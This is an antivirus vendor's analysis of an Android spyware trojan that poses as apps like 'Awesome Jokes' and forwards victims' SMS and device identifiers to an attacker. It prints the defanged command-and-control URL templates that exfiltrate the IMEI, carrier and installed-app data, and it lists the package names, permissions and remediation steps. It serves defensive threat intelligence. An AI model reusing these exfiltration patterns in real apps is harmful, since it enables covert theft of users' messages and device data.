Android/Tetus.A!tr.spy
Analysis
Android/Tetus.A!tr.spy is a piece of malware targetting Android mobile phones.
The malicious package comes disguised as legitimate applications such as 'Awesome Jokes', 'Celeb Stalker' etc. The malware silently forwards all incoming SMS messages to the attacker's server and it also tracks installation of other related applications.
Technical Details
The piece of malware and comes in the packages such as "com.droidmojo.awesomejokes", "com.droidmojo.celebstalker", "com.appengines.fastphone" etc. (ref Fig1, 2 and 3)
Fig1 : Awesome Jokes application icon
Fig2 : Celeb Stalker application icon
Fig3 : Faster Phone application icon
When launched, the application shows a screen corresponding to the application it claims to be.
Once the application page is loaded, the malware registers with a remote website by sending an HTTP request is sent to
[PKG_URL]/ip.php?market=1&lpn=300&pid=[PID] &pm=[Build.MODEL]&vd=[Build.MANUFACTURER] &c=[NETWORK_CARRIER]&imei=[IMEI]&firmware=[FIRMWARE_VERSION] &sdk=[SDK_NUMBER]&sid=[SID]&cc=[NETWORK_OPERATOR_NAME]where PKG_URL varies with the application eg : hxxp://[REMOVED].droidmojo.net, hxxp://[REMOVED]-finity.net, hxxp://[REMOVED]-engines.com.
The server responds with several parameters contained in a JSON object which are used, in particular, to send SMS messages.
Next, an HTTP request is sent out to
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] "&pid=" + [PID] + "&type=message&log=" + [STR]where
- IMEI = infected phone's IMEI
- PID = obtained from the package resources
- STR = [keyword] ?ucsa=[ucsa]
Then, an SMS is sent to a number [csc] with the content
[keyword] ?ucsa=[ucsa]where csc, keyword and ucsa are obtained from the JSON response.
Finally, an HTTP request is sent out to
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] "&pid=" + [PID] + "&type=sms&log=" + [STR]where
- IMEI = infected phone's IMEI
- PID = obtained from the package resources
- STR = "Unknown", "SMS_sent", "Generic_failure", "No_service", "Null_PDU" or "Radio_off" ; depending upon the result of SMS sending
Besides HTTP requests, the malware implements a SMS receiver that forwards the message body of incoming SMS messages to the number [csc].
Whenever a new related application is installed, a request containing the list of related installed applications is sent to the attacker's server at
http://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] + "&pid=" + [PID] + "&type=marketreciever&log=" + [INSTALLED_APPS]A "related" application is one of those applications:
- com.droidmojo.awesomejokes
- com.droidmojo.celebstalker
- com.appengines.fastphone
Permissions required by the application:
- INTERNET
- ACCESS_NETWORK_STATE
- SEND_SMS
- READ_PHONE_STATE
Recommended Action
- FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extended | |
FortiClient | |
Extreme | |
FortiAPS | |
FortiAPU | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |